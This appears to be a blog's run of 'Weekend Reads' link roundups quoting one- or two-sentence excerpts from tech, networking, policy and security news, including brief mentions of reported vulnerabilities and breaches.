Weekend Reads 101324


A study by the US General Services Administration (GSA) has revealed that five remote identity verification (RiDV) technologies are unreliable, inconsistent, and marred by bias across different demographic groups.


This time, he included a PoC that caused the ChatGPT app for macOS to send a verbatim copy of all user input and ChatGPT output to a server of his choice.


In the quest to revolutionize medicine, our bodies are becoming living laboratories. By 2030, itメs estimated that bioprinting could address up to 20% of the organ transplant waiting list globally.


Consider this: For every 1,000 human users in your organization, you likely have 10,000 non-human connections or credentials. Some estimates suggest the ratio could be as high as 45-to-1.


The U.S. Department of Justice (DOJ) is considering recommending a federal judge to force Google to sell parts of its business in a bid to eliminate its alleged monopoly on online search, according to a court filing Tuesday.


A US jury has found that employment practices at Cognizant constitute discriminatory conduct toward non-Indian workers in a case that originated in 2013 and claimed the tech giant favored H-1B visa holders from India over local workers.


Consumers are victims of online scams and have their data stolen, but they are lagging on adopting security tools to protect themselves.


At the end of its 2024 term, the Supreme Court decided two cases with a significant, if not historic, impact on the ability of federal agencies to regulate areas of the national economy within their jurisdiction, including the FCC’s ability to regulate telecommunications and Internet service providers.


He criticized the reliance on just two or three ultra-high capacity cables driven by over-the-top (OTT) providers such as major tech companies, which have different network requirements from traditional telecom providers.


The Wall Street Journal is reporting that Chinese hackers (Salt Typhoon) penetrated the networks of US broadband providers, and might have accessed the backdoors that the federal government uses to execute court-authorized wiretap requests.


The specification for UUIDs was written in 2005 and is defined in RFC 4122. This specification has served the industry fairly well. Even so there have been many other mechanisms for generating unique identifiers to try to make up for the shortcomings of the original specification.


Because Kerberoasting enables cyberthreat actors to steal credentials and quickly navigate through devices and networks, it’s essential for administrators to take steps to reduce potential cyberattack surfaces.

Weekend Reads 100624


Thanks to the popularity and widespread success of ChatGPT, most IT users are familiar with the concept of a large language model (LLM). But how does an LLM apply to network operations?


If you don’t know what you’re operating on, or what the expected output range might be, then maybe you ought not to be operating on that data in the first place. But now these languages have gotten into the wild and we’ll never be able to hunt them down and kill them soon enough for my liking, or for the greater good.


We then analyze ten data sets spanning industry and academic sources, across four years (2019-2023), to find and explain discrepancies based on data sources, vantage points, methods, and parameters.


Phishing attacks, which trick users into sharing private data, have been a major security threat for years. According to a 2023 FBI report, it is the top digital crime type.


A test account that’s shared among many can be used by anyone who happens to have the password. This leaves a trail of poorly managed or unmanaged accounts that only increases your attack surface.


As radio host Mark Davis put it recently, “ultimately everything AI does is go in search of something that some human being said or wrote sometime.”


One of the most exciting recent developments in web performance is Zstandard (zstd) — a new compression algorithm that we have found compresses data 42% faster than Brotli while maintaining almost the same compression levels.


In this paper, we introduce a generic security model for Web services based on three dimensions of resolution, transaction, and identification.


For generative artificial intelligence (GenAI) models, the concept of the Promethean dilemma has so far been discussed, starting with whether general access to GenAI systems should be permitted for public use, given their black box nature and tendency to confabulate.


All crypto assets in 2024 amounted to only 0.5% of the world’s money supply. But they have enabled a lot of troublesome speculative behavior as well as illicit activities such as money laundering and tax evasion, financial scandals, illegal gambling, and financing of terrorism and the drug trade. Some governments would like to provide alternatives.


Threat actors can often find targeting certain organizations too much of a challenge. So they need to go through what we can consider back channels—suppliers, vendors, or service providers.


Most exploitable GPU vulnerabilities are in the implementation of the GPU kernel mode modules. These modules are pieces of code that load/unload during runtime, extending functionality without the need to reboot the device.


Memory safety vulnerabilities remain a pervasive threat to software security. At Google, we believe the path to eliminating this class of vulnerabilities at scale and building high-assurance software lies in Safe Coding, a secure-by-design approach that prioritizes transitioning to memory-safe languages.


Session hijacking looks quite different these days. No longer network-based, modern session hijacking is an identity-based attack performed over the public internet targeting cloud-based apps and services.

Weekend Reads 092824


Instead, Broadcom is now experimenting with co-packaging the optics directly into the GPUs themselves.


With K-12 schools back in session across the nation, millions of students are adjusting to a new learning environment — a cellphone-free classroom or, in some cases, a phone-free school day.


Being at the core of the Internet places the DNS under a lot of pressure. New forms of DNS abuse emerge each year, disputes over domain names persist, and all the while, the Internet just keeps getting bigger.


The censorship war has hit a flashpoint. Late last month, Brazil banned Elon Musk’s social media site, X, after Musk refused a government order to suppress seven dissident accounts.


This raises a question. If someone is situated in South America and wants to access youtu.be, is their performance going to be impacted (assuming he has to do the entire recursive lookup with no cache)?


ODA focuses on identifying macroscopic Internet outages, such as outages that affect a significant portion of the population within either a geographic region or an Autonomous System (AS).


For practitioners, this study provides a rich set of criteria that can be used for evaluating their projects, as well as strong evidence of the importance of considering not only project execution, but also post-project outcomes and impacts in the evaluation.


As if we didn’t have a long enough list of problems to worry about, Lumen researchers at its Black Lotus Labs recently released a blog that said that it knows of three U.S. ISPs and one in India was hacked this summer.


While the usage of internationalized domain names (IDNs) has allowed organizations the world over to enter the global market using their native-language domain names, it can also enable cyber attackers to craft look-alikes of legitimate domains they wish to spoof.


In Texas, for example, the chatbot only consumes an estimated 235 milliliters needed to generate one 100-word email. That same email drafted in Washington, on the other hand, would require 1,408 milliliters (nearly a liter and a half) per email.


Fiber splicing is joining two optical fibers to create a continuous, low-loss, and highly efficient optical path.


Efforts to curb illegal online content through domain shutdowns are proving ineffective and carry significant risks, according to a new report by eco and its topDNS initiative.


The majority of open source project maintainers are not being paid for their work, spend three times as much time on security than they did three years ago, and have become less trusting of contributors following the xz backdoor, according to open source package security firm Tidelift.

Weekend Reads 090724


A federal judge struck down a Biden administration rule on Tuesday that banned employers from using noncompete agreements, which would have affected the contracts of millions of Americans.


The Open Compute Project, the org best known for offering designs for hyperscale hardware, has rounded up AWS, Google, Meta, and Microsoft to help it test concrete.


Recent trends show that ransomware attacks continue to grow more advanced and persistent.


When you are designing applications that run across the scale of an entire datacenter and that are comprised of hundreds to thousands of microservices running on countless individual servers and that have to be called within a matter of microseconds to give the illusion of a monolithic application, building fully connected, high bi-section bandwidth Clos networks is a must


The National Institute of Standards and Technology (NIST) just released three finalized standards for post-quantum cryptography (PQC) covering public key encapsulation and two forms of digital signatures. In progress since 2016, this achievement represents a major milestone towards standards development that will keep information on the Internet secure and confidential for many years to come.


Linearity is one of the greatest success stories in mathematics. According to Encyclopedia Britannica, “Unlike other parts of mathematics that are frequently invigorated by new ideas and unsolved problems, linear algebra is very well understood.”


The Turing test could be useful for checking whether a customer service chatbot, for instance, is interacting with people in a way that those people are comfortable with, demonstrating what Jones calls a flexible social intelligence. Whether it can identify more general intelligence, however, is difficult to say.


But in at least some situations, the Supreme Court held this spring in a case called Lindke v. Freed,a it is illegal to block other users. If you are a government official, and you are using social media as part of your job duties, they may have a First Amendment right against being blocked


The recent emergence of generative artificial intelligence and the arrival of assistive agents based on this technology have the potential to offer further assistance to searchers, especially those engaged in complex tasks.


Design and engineering teams increasingly are turning to both classical AI and generative AI to rethink, reinvent, and remake the modern microchip.


In a groundbreaking development for quantum communication, researchers at Qunnect Inc. have successfully achieved the automated distribution of polarization-entangled photons over New York City’s existing fiber network.


The internet is currently controlled through searching, and if Google single-handedly dominates the means through which searching works, then Google effectively controls the internet.

Weekend Reads 083024


Microsoft on Thursday disclosed four medium-severity security flaws in the open-source OpenVPN software that could be chained to achieve remote code execution (RCE) and local privilege escalation (LPE).


Cybersecurity researchers have discovered multiple critical flaws in Amazon Web Services (AWS) offerings that, if successfully exploited, could result in serious consequences.


As many as 10 security flaws have been uncovered in Google’s Quick Share data transfer utility for Android and Windows that could be assembled to trigger remote code execution (RCE) chain on systems that have the software installed.


SiFive has announced the launch of its latest core for datacenters, the P870-D, and claims it has a leg up on Arm’s Neoverse N2 in density for AI.


Unstoppable Domains (UD), a provider of Web3 domain names and digital identities, has been officially accredited by the Internet Corporation for Assigned Names and Numbers (ICANN).


CENTR, the association overseeing European country code top-level domain (ccTLD) registries, has announced the public release of its Domain Crawler Project code.


Remote SIM provisioning (RSP) for consumer devices is the protocol specified by the GSM Association for downloading SIM profiles into a secure element in a mobile device. The process is commonly known as eSIM, and it is expected to replace removable SIM cards.


The WhoisXML API research team analyzed more than 7.3 million domains registered between 1 and 31 July 2024 in this post to identify five of the most popular registrars, top-level domain (TLD) extensions, and other global domain registration trends.


Unit 42 monitors ransomware and extortion leak sites closely to keep tabs on threat activity. We reviewed compromise announcements from 53 dedicated leak sites in the first half of 2024 and found 1,762 new posts.


Cybersecurity researchers have disclosed a security flaw impacting Microsoft Azure Kubernetes Services that, if successfully exploited, could allow an attacker to escalate their privileges and access credentials for services used by the cluster.


To illustrate the complexity and severity of modern application attacks, let’s examine an attack against the infamous Log4Shell vulnerability (CVE-2021-44228) that sent shockwaves through the cybersecurity world in late 2021


When it comes to breach disclosures, today’s chief information security officers (CISOs) are struggling with an especially turbulent regulatory environment.


Data centers are part of the vital infrastructure behind consumer-facing services, and they now find themselves in the crosshairs. By weaponizing permitting and zoning laws, emissions and electricity regulations, and tax hikes, policymakers aim to sabotage operations altogether.


Inspired by recent presentations and discussions around Tetragon, we picked out the top security observability use cases – and what we find are extensive use cases deep across the security application landscape.


Over the past few years, TV makers have seen rising financial success from TV operating systems that can show viewers ads and analyze their responses.

Weekend Reads 081624


Beware of Internet FORCES aiming to change your mind or direct your decisions! That acronym, coined by behavioral scientist Patrick Fagan, helps people know when they’re being “nudged.”


Enter your name into an internet search engine and the first few results will probably include detailed profiles of you compiled by “people-search” websites with names like Intelius, PeopleFinders, and Spokeo.


Following the July 19 outages caused by a bad update, the cybersecurity firm faces shareholder lawsuits and pressure to pay damages for at least one major customer, Delta Airlines. Will software liability follow?


Since 1998 — the last year Congress passed a major law to reform the tech industry and protect children in the virtual space — a lot has changed.


According to a damning report from 404 Media, backed with internal Slack chats, emails, and documents obtained by the outlet, Nvidia helped itself to “a human lifetime visual experience worth of training data per day,” Ming-Yu Liu, vice president of Research at Nvidia and a Cosmos project leader, admitted in a May email.


It has been an enduring fascination to see how we could use packet networking in the context of digital communications in space.


At a recent conference I attended, a speaker referenced media ecologist Neil Postman and his “rules” for evaluating the pros and cons of any given technological development.


In the 18th century, Wolfgang von Kempelen’s victorious mechanical Turk (1770) amazed the world, see Figs.1-4. However, there was a person hidden inside.


LibreQoS is an open source project and the subject of a popular recent APNIC Academy webinar. Responding to feedback given at the webinar, this post will look at the features of LibreQoS.


Huawei Cloud has developed a network monitoring tool that, when used in production on three of its own regions, was able to observe more of its infrastructure than existing tools, and revealed issues that previously evaded human efforts.


Decoupling authorization from your main application code makes authorization more scalable, easier to maintain, and simpler to integrate with your components. However, these benefits are difficult to realize if you don’t consciously plan for them within your authorization implementation.


In this episode of PING, Casper Schutijser and Ralph Koning from SIDN Labs in the Netherlands discuss their post-quantum testbed project.

Weekend Reads 081024


Network observability tools provide information on the health and behavior of applications, offer insights into end-user experience, and detect anomalies that are indicative of security incidents.


Maestro is a general-purpose, horizontally scalable workflow orchestrator designed to manage large-scale workflows such as data pipelines and machine learning model training pipelines.


It might be time to get the pens and notebooks back out and shut off the keyboard for a while. Just pretend you’re back in the first grade and don’t have a minicomputer in your back pocket.


Intel has finally provided an update on instability issues on 13th-gen and 14th-gen CPUs. An update posted by Thomas Hannaford, Intel’s communications manager, pins the instability on an error in the microcode that requests incorrect voltage numbers, leading to instability in the processor.


Separation agreements Meta gave to employees during mass 2022 layoffs are illegal, a US judge has decided, and the reasoning could have implications far beyond Zuckercorp.


In 1940, thirteen percent of the U.S. population lived in suburbs. In 2010, it was half. An analysis by demographer Wendell Cox of population trends during the 2010s showed that 92 percent of all growth in major metropolitan areas was in the suburbs and exurbs ラ a trend that well preceded the pandemic.


Searchable Encryption has long been a mystery. An oxymoron. An unattainable dream of cybersecurity professionals everywhere.


Two US senators have urged the FTC to probe and potentially prosecute three automakers that allegedly unlawfully sold motorists’ personal data for pennies.


As the COVID-19 pandemic came to an end, a number of large companies pushed for their workers to return to the office five days a week — a policy that prompted many employees to “quiet quit” in protest.


At what was billed as a “fireside chat” at Tel Aviv University in June 2023, the very first question from the audience posed to OpenAI CEO Sam Altman and chief scientist Ilya Sutskever was, “Could open source LLMs (large language models) potentially match GPT-4’s abilities without additional technical advances, or is there a ‘secret sauce’ in GPT-4 unknown to the world that sets it apart from the other models?”


The blame game doesn’t stop there. One link in this chain of infamy hasn’t received the attention it deserves – but this link took what should have been a small hiccup and turned it into a global meltdown.


Now it seems that AI itself might be our best defense against AI fakery after an algorithm has identified telltale markers of AI videos with over 98% accuracy.


Rolls-Royce has cleared a key hurdle in the race to build Britain’s first mini-nuclear power plant as competition across Europe ramps up.